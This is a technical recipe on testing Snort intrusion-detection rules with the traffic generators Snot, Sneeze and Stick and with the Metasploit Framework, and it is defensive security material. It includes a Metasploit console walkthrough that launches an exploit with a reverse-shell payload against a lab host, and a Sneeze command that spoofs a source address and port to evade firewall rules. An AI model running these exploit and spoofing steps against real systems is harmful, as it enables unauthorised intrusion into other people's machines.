Tools for Testing Signatures

2017-11-03 09:05:02

Problem

You want to test your Snort rules.

Solution

Use Snot to generate traffic based on Snort rules. Snot uses the libnet library for packet generation. However, since Snot has not been updated for a few years, it does not work with the latest libnet package. You must install libnet and Snot with the following commands:

[root@localhost root]# tar zxvf libnet-1.0.2a.tar.gz [root@localhost root]# cd Libnet-1.0.2a/ [root@localhost Libnet-1.0.2a]# ./configure [root@localhost Libnet-1.0.2a]# make [root@localhost Libnet-1.0.2a]# make install [root@localhost root]# tar zxvf snot-0.92a.tar.gz [root@localhost root]# cd snot-0.92a [root@localhost snot-0.92a]# make

Sneeze also generates traffic based on Snort rules. It is a Perl script and uses the Net::RawIP Perl module for packet generation. Use the following commands to install Sneeze:

[root@localhost root]# tar xvf sneeze-1.0.tar [root@localhost root]# cd sneeze [root@localhost sneeze]# perl -MCPAN -e 'install Net::RawIP'

Stick generates traffic based on Snort rules at a high speed and is used for stress testing an IDS. Use the following to install it:

[root@localhost root]# tar zxvf stick.tgz [root@localhost root]# cd stick

Next, put your rules in the vision.txt file or use the default rules:

[root@localhost stick]# ./create_stick

The Metasploit Framework is a collection of exploits used for penetration testing, exploit development, and IDS testing. Use the following commands to install the Metasploit Framework:

[root@localhost root]# tar zxvf framework-2.2.tar.gz [root@localhost root]# cd framework-2.2 [root@localhost framework-2.2]# cd extras [root@localhost extras]# tar zxvf Term-ReadLine-Gnu-1.14.tar.gz [root@localhost extras]# cd Term-ReadLine-Gnu-1.14 [root@localhost extras]# perl Makefile.PL [root@localhost extras]# make [root@localhost extras]# make install [root@localhost extras]# cd .. [root@localhost framework-2.2]# mkdir /usr/local/msf [root@localhost framework-2.2]# cp -R * /usr/local/msf [root@localhost framework-2.2]# ln -s /root/framework-2.2/msf* /usr/local/bin

Discussion

IDS testing is not an exact science. Most of the tools that have been developed generate traffic that will specifically trigger rules. Another method is to just use real attacks. There are several free open source tools that will do both of these things.

Snot generates traffic to trigger Snort rules. It uses Snort rules files as its source of packet information. It also randomizes information that is not contained in the rule to evade detection. It runs on BSD, Linux, and Windows. The following output shows the Snot usage information:

[root@localhost snot-0.92a]# ./snot Usage: snot -r [-s ] [-d ] [-n ] [-l ] [-p]

The -r command-line option and the rule filename are required to generate Snot traffic. The -s command-line option specifies the source IP address or an array of IP addresses. The -d command-line option specifies the destination IP address or an array of IP addresses. The -n command-line option specifies the number of packets to generate. By default, Snot will continue to generate packets infinitely. Setting -n 0 also will generate infinite traffic. The -l command-line option creates a delay between packets. Snot will choose a random number between 1 and the specified delay and sleep for that amount of time between packets. The -p command-line option will disable the random payload generation. This improves signature matching against older, less intelligent IDSes, but also makes Snot detection easier.

The following example generates infinite traffic based on the rules located in the file rule.txt:

[root@localhost snot-0.92a]# ./snot -r ./rule.txt

The following example generates 10 packets based on the rules located in the rule.txt file with the specified source and destination addresses:

[root@localhost snot-0.92a]# ./snot -r ./rule.txt -s 192.168.1.1 -d 192.168.1.2 -n 10 snot V0.92 (alpha) by sniph (sniph00@yahoo.com) ---------------------------------------- Rulefile : ./rule.txt Source Address : 192.168.1.1 Dest Address : 192.168.1.2 Number of Packets : 10 Delay (max seconds): No Delay Payloads : Random ---------------------------------------- [Parse Rules - Completed parsing 1 rules - Sending now] TCP - "SCAN nmap XMAS" - 192.168.1.1:15100 -> 192.168.1.2:25462 TCP - "SCAN nmap XMAS" - 192.168.1.1:7906 -> 192.168.1.2:58236 TCP - "SCAN nmap XMAS" - 192.168.1.1:65349 -> 192.168.1.2:32368 TCP - "SCAN nmap XMAS" - 192.168.1.1:177 -> 192.168.1.2:8887 TCP - "SCAN nmap XMAS" - 192.168.1.1:63313 -> 192.168.1.2:49610 TCP - "SCAN nmap XMAS" - 192.168.1.1:16311 -> 192.168.1.2:3367 TCP - "SCAN nmap XMAS" - 192.168.1.1:1027 -> 192.168.1.2:53120 TCP - "SCAN nmap XMAS" - 192.168.1.1:60630 -> 192.168.1.2:55688 TCP - "SCAN nmap XMAS" - 192.168.1.1:24748 -> 192.168.1.2:716 TCP - "SCAN nmap XMAS" - 192.168.1.1:32102 -> 192.168.1.2:7636

Sneeze is a traffic generator written in Perl that triggers Snort rules. Like Snot, it also reads Snort rules files and uses them to generate packets. It also has several configurable command-line options. The following output shows the Sneeze usage information:

[root@localhost sneeze]# ./sneeze.pl Usage ./sneeze.pl -d -f [options] -c count Loop X times. -1 = = forever. Default is 1. -s ip Spoof this IP as source. Default is your IP. -p port Force use of this source port. -i interface Outbound interface. Default is eth0. -x debug Turn on debugging information. -h help Duh? This is it.

The following example generates traffic based on the rules contained in the file exploit.rules to the specified destination address:

[root@localhost sneeze]# ./sneeze.pl -d 192.168.1.2 -f /root/snort-2.2.0/rules/exploit.rules ATTACK: 192.168.1.1:59937 -> 192.168.1.2:47423 ATTACK: EXPLOIT ssh CRC32 overflow /bin/sh ATTACK TYPE: shellcode-detect tcp 192.168.1.1:49895 -> 192.168.1.2:22 Reference => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0572 Reference => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0144 Reference => http://www.securityfocus.com/bid/2347 ATTACK: EXPLOIT ssh CRC32 overflow NOOP ATTACK TYPE: shellcode-detect tcp 192.168.1.1:13246 -> 192.168.1.2:22 Reference => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0572 Reference => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0144 Reference => http://www.securityfocus.com/bid/2347

You can also attempt to avoid firewall rules by using the -s command-line option to spoof a source host, along with the -p option to specify a source port:

[root@localhost sneeze]# ./sneeze.pl -d 192.168.1.2 -f /root/ snort-2.2.0/rules/exploit.rules -s www.something.com -p 53

By default, Sneeze will send each packet one time. You can use the -c command-line option to specify the number of times to loop through the rules file or -1 to loop infinitely:

[root@localhost sneeze]# ./sneeze.pl -d 192.168.1.2 -f /root/ snort-2.2.0/rules/exploit.rules -c 10 [root@localhost sneeze]# ./sneeze.pl -d 192.168.1.2 -f /root/ snort-2.2.0/rules/exploit.rules -c -1

Stick is a traffic generator written in C that uses Snort rules to create packets. It also allows several configurable command-line options. The rules specified in the file vision.txt are executed in a random order at about 250 per second. The following is an example of using Stick in default mode, in which it uses a random source address between 0.0.0.0 and 255.255.255.255 and a destination IP address of 10.0.0.1:

[root@localhost stick]# ./stick Stress Test - Source target is set to all 2^32 possiblities Destination target value of: 100000a sending rule 975 sending rule 891 sending rule 458 sending rule 538 sending rule 559 sending rule 861

The following command-line options are from the Stick README file:

sH xxx.xxx.xxx.xxx This is a single source IP that the IP headers should use as the source. sC xxx.xxx.xxx.0 This is a single Class C space that has a simple random last octet. sR aaa.aaa.aaa.xxx aaa.aaa.aaa.yyy This is a sub class C range! ex. ./stick sR 192.168.128.2 192.168.128.55 dH xxx.xxx.xxx.xxx This is a single desination IP for the IP header. dC xxx.xxx.xxx.0 This is a single Class C space that has a random last octet. dR aaa.aaa.aaa.xxx aaa.aaa.aaa.yyy This is a sub class C range!

You can use the Stick command-line parameters, as in the following example, to generate traffic with the specified source and destination IP addresses:

[root@localhost stick]# ./stick sH 192.168.100.10 dH 192.168.200.20

The Metasploit Framework is an advanced open source platform, written in Perl, for developing, testing, and using exploit code. It is used for penetration testing, exploit development, vulnerability research, and IDS and firewall testing. In addition to Perl, it includes other components written in C, assembler, and Python. It runs under most Unix systems, and a customized Cygwin environment is provided for Windows. The Metasploit Framework can be executed by using the command-line interface, console interface, or web interface. The following example shows how to execute an exploit using the console interface:

[root@localhost framework-2.2]# msfconsole msf > show exploits #The installed exploits will be listed. msf > info blackice_pam_icq #Information on the exploit will be displayed. msf > use blackice_pam_icq msf blackice_pam_icq > set RHOST 192.168.1.2 RHOST -> 192.168.1.2 msf blackice_pam_icq > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf blackice_pam_icq(win32_reverse) > set LHOST 192.168.1.1 LHOST -> 192.168.1.1 msf blackice_pam_icq(win32_reverse) > set TARGET 0 TARGET -> 0 msf blackice_pam_icq(win32_reverse) > exploit [*] Starting Reverse Handler. #Status of the exploit will be displayed.

The following example shows how to start the web interface:

[root@localhost framework-2.2]# ./msfweb [*] Starting Metasploit v2.2 Web Interface on 127.0.0.1:55555...

Once the web server is started, you can open a web browser and enter http://localhost:55555 to execute the interface.

Tools for Testing Signatures

Analyzing and Graphing Logs

Категории